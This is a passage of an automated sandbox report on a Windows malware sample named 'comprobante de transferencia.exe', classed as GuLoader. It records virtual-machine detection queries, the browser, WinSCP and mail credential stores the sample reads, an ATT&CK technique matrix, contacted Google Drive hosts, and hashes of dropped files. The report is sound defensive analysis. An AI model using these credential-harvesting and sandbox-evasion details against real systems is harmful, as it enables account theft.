Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Memory allocated: 34210000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Memory allocated: 36210000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

API coverage: 2.3 %

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 0_2_0040635D FindFirstFileW,FindClose,	0_2_0040635D
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040580B
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_0040635D FindFirstFileW,FindClose,	2_2_0040635D
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_0040580B
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Code function: 2_2_004027FB FindFirstFileW,	2_2_004027FB

Source: comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A85000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\comprobante de transferencia.exe	API call chain: ExitProcess graph end node			graph_0-4548
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	API call chain: ExitProcess graph end node			graph_0-4551

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Code function: 0_2_00405648 CreateDirectoryW,GetLastError,GetLastError,LdrInitializeThunk,SetFileSecurityW,GetLastError,

0_2_00405648

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Process created: C:\Users\user\Desktop\comprobante de transferencia.exe C:\Users\user\Desktop\comprobante de transferencia.exe

Jump to behavior

Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Queries volume information: C:\Users\user\Desktop\comprobante de transferencia.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040326A

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\comprobante de transferencia.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\comprobante de transferencia.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\comprobante de transferencia.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de transferencia.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000002.00000002.7701035769.0000000034211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: comprobante de transferencia.exe PID: 8496, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	1 OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Email Collection	21 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	12 Virtualization/Sandbox Evasion	1 Credentials in Registry	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Disable or Modify Tools	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	26 System Information Discovery	Distributed Component Object Model	1 Clipboard Data	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
comprobante de transferencia.exe	100%	Avira	HEUR/AGEN.1361137
comprobante de transferencia.exe	63%	ReversingLabs	Win32.Trojan.GuLoader

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.251.40.142	true	false		high
drive.usercontent.google.com	142.251.41.1	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	comprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.quovadis.bm0	comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000003.2903958987.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.usercontent.google.com/	comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/Ar=	comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A28000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	comprobante de transferencia.exe, 00000002.00000003.2903907971.0000000003AFC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	comprobante de transferencia.exe	false		high
https://ocsp.quovadisoffshore.com0	comprobante de transferencia.exe, 00000002.00000003.2916893113.0000000003AA1000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A9B000.00000004.00000020.00020000.00000000.sdmp, comprobante de transferencia.exe, 00000002.00000003.2903958987.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/	comprobante de transferencia.exe, 00000002.00000002.7687280921.0000000003A28000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.251.40.142	drive.google.com	United States		15169	GOOGLEUS	false
142.251.41.1	drive.usercontent.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1411000
Start date and time:	2024-03-18 15:04:15 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 34s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	comprobante de transferencia.exe
Detection:	MAL
Classification:	mal80.troj.spyw.evad.winEXE@3/9@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 94% Number of executed functions: 73 Number of non-executed functions: 73
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, UserOOBEBroker.exe
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: comprobante de transferencia.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Grundforbedre39.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.251.40.142 142.251.41.1
	Quote.exe	Get hash	malicious	FormBook	Browse	142.251.40.142 142.251.41.1
	PI.1.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.251.40.142 142.251.41.1
	QUOTE.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.251.40.142 142.251.41.1
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	142.251.40.142 142.251.41.1
	SSDAIG33Zh.exe	Get hash	malicious	Babuk, Djvu	Browse	142.251.40.142 142.251.41.1
	Vindegade.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.251.40.142 142.251.41.1
	reundertake.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	142.251.40.142 142.251.41.1
	Request for quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.251.40.142 142.251.41.1
	DHL Booking.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.251.40.142 142.251.41.1

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll	Grundforbedre39.exe	Get hash	malicious	FormBook, GuLoader	Browse
	cuenta para pago1.exe	Get hash	malicious	GuLoader	Browse
	Grundforbedre39.exe	Get hash	malicious	GuLoader	Browse
	venerationens.exe	Get hash	malicious	FormBook, GuLoader	Browse
	venerationens.exe	Get hash	malicious	GuLoader	Browse
	Interviewed.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Interviewed.exe	Get hash	malicious	GuLoader	Browse
	Arborean.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Medarbejderstabens189.exe	Get hash	malicious	FormBook, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsk3D2F.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\comprobante de transferencia.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.656126712214018
Encrypted:	false
SSDEEP:	192:em24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35OlESl:m8QIl975eXqlWBrz7YLOlE
MD5:	A4DD044BCD94E9B3370CCF095B31F896
SHA1:	17C78201323AB2095BC53184AA8267C9187D5173
SHA-256:	2E226715419A5882E2E14278940EE8EF0AA648A3EF7AF5B3DC252674111962BC
SHA-512:	87335A43B9CA13E1300C7C23E702E87C669E2BCF4F6065F0C684FC53165E9C1F091CC4D79A3ECA3910F0518D3B647120AC0BE1A68EAADE2E75EAA64ADFC92C5A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Grundforbedre39.exe, Detection: malicious, Browse Filename: cuenta para pago1.exe, Detection: malicious, Browse Filename: Grundforbedre39.exe, Detection: malicious, Browse Filename: venerationens.exe, Detection: malicious, Browse Filename: venerationens.exe, Detection: malicious, Browse Filename: Interviewed.exe, Detection: malicious, Browse Filename: Interviewed.exe, Detection: malicious, Browse Filename: Arborean.exe, Detection: malicious, Browse Filename: Medarbejderstabens189.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L...zc.W...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Fjeldklftens38.bio

Download File

Process:	C:\Users\user\Desktop\comprobante de transferencia.exe
File Type:	data
Category:	dropped
Size (bytes):	200432
Entropy (8bit):	3.234993383739913
Encrypted:	false
SSDEEP:	3072:MbK3xS/itsupP4zlLPatE1650lNzpANsqud:x2K16zJa2Qwd
MD5:	910B94BB45EC253A90F4CA8FA56BC584
SHA1:	ED29E140FE94207B697953B8D1466F7C02F4E60E
SHA-256:	BE72DFD9F250BBD69DCFD4508D08A327CBB9B3FBB11964FD5F66BEE35A9FD5C9
SHA-512:	93C902D3EC6959BBFA801D13A787A157A998B3615E69EFA205D0952FA6A9935AB699E62316A20F5DB0682DA340FAC8B8454272DDFE9C82D7C16CF57FBB6EE1A0
Malicious:	false
Reputation:	low
Preview:	j....................W.................w......Y............'.......e.......h.E.R.........................................w.O..............B.......e.............!...M..r..................i....o.......D.........".....$.....k....)........................V..................o..n.....w...............j.nO..........B..........a......K.......=....a............hA......0......w...........X......x.........$..u..G..........t.....X........\|.....H.............................................x.....4...K....7...............j................!...3......F......l......T............U.......v.............~..ay..............G.T...v.q.Tl.'..T...cZ.........1.........,.......H...........P.............n.5...................y...V..[.................~..c..............O.v...V............a.......z=.....r.................{.....P.............+..........$............./.....#................/.....@.....5Q..2...../................H.......3............u\|.........$.........................w.i......................c.......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Gaudiest.pre

Download File

Process:	C:\Users\user\Desktop\comprobante de transferencia.exe
File Type:	data
Category:	dropped
Size (bytes):	274661
Entropy (8bit):	3.2513826448357057
Encrypted:	false
SSDEEP:	3072:VLYngh97JDNV3fLhV/OKJCY2kKIwk7Xf7NTVaYYvPclKkL:5Y6Dnj7JCkK/ovBT89cII
MD5:	9CB88B1AE7827818B29E20B15C82A937
SHA1:	A60DFA07CBF65C96A3C7019D99452F138A12746E
SHA-256:	445AA65354C5F1118FE748FE21ACFA11A69400398DD1CEAE2362242B187CF754
SHA-512:	2D0B4879369B2ADF0136AA2CDB1299614311A16D76F2A4FB90521E5D2EA17153874DA1F40C25A0CEBEDBE18DD31C2102AA0B6FAF295F1838FB3798CACA3EF1BE
Malicious:	false
Reputation:	low
Preview:	_..................................................J...T......4..N.......1................D...?...a.....j..................2................0.\.J...M...y....Ib..E...he...F..!...............$.M...........D.t...N....m...................j.......................g.z.....}.q.....,.........:....5................J.....]......=..............S......'.....M.:.........P....s...V..w...............\|.......5.....D..............=."......8...l..............7..................'....j.....c..................."Z..E.f.......a.....S....\|......w=...'t.[vP".........J...Y.........../.......K..........IlB......5........(...........E.b.....@.....................B...................qI.... ......}..>......k.;.Q........U..@e..............J,..qB...`h............:.......x.......3........................L..........2.B...............................P.....z...............=...e....&.....Z..............%.....~h......................................*........l.....G.................]...............H............Y........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Morel.Off24

Download File

Process:	C:\Users\user\Desktop\comprobante de transferencia.exe
File Type:	data
Category:	dropped
Size (bytes):	59489
Entropy (8bit):	4.580505754362581
Encrypted:	false
SSDEEP:	768:XPXHwrXXLjLW9P0urM8Wq9AcrFvxMh18l6LYn+wKaxTT1cJ/X5iqmdKxRC:2LjLWr1WqN/M4mY+wKaBTQ/X5+KC
MD5:	9140973AC47B93AF67ACBA70D8840AD4
SHA1:	5431473058B0F1A06832A7C4AE8525C976620618
SHA-256:	7E665361FD0DB8138B3CF34029342C553CFCD80330F28CBC214423E672BB20F7
SHA-512:	F9D180A50699D5A0C517858B813627036C55E87154983A94CB173462C860A7DCA711C139B69074130316AD19EF7BFCE602153931401B74766C8BA8686356BFBE
Malicious:	false
Reputation:	low
Preview:	......~~.................!!....x...................Y...VV...........................'......#.....p.......x.555.EEE.......[.........z.E.RRR.......5.q.....T..SS.\.{................................,...u..$...........,..,..............nn..$....j.f.....n.X.M...................!........iiiii...................Q.......n..g....................................G...]............................!.........""""......nn.................\|\|\|.........''..............8.............o.11..........................l.{{...........;...2..........GGG...ll......Y.....000..........e..............xx.D..........OOOOOO..........III...}............;....'..........WWW..........zz..............""""...........x......NN..............qq......??..........................._.#...........^^.....H...............\\\\..........i...............jjj................XXXXX.fff.:........J..[.....\\.\\\................k......S.00......................b......T......].**...A....3....;..................................--...........R..6.uu.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Renoveringers\Buddhisme\Indordningers207\Faultiest\gagers.rec

Download File

Process:	C:\Users\user\Desktop\comprobante de transferencia.exe
File Type:	data
Category:	dropped
Size (bytes):	183776
Entropy (8bit):	3.2465393215116713
Encrypted:	false
SSDEEP:	3072:0Y0pp0QgB1Uepc+D+FJOHDz9WWhEGwk/oZP:0Y0piQgB1Uepc+6Q5h7T/+
MD5:	B013C10185F365E645B1A8A4090DE5AF
SHA1:	20F0178AD225AEC8785EA741E82729E6D816CEF0
SHA-256:	0A403F11C29743BFFF4A5CBB13DA533121BC9CEC2F2BD38473F3939895422E4C
SHA-512:	B33FDB0357DA26C5E4A6BB45B50FDEAFE102E428F56D90A5EAC57829F5F57F8323C689A2BE928A468DB46948012078D10B605AE03F246EAA72827B1351807412
Malicious:	false
Reputation:	low
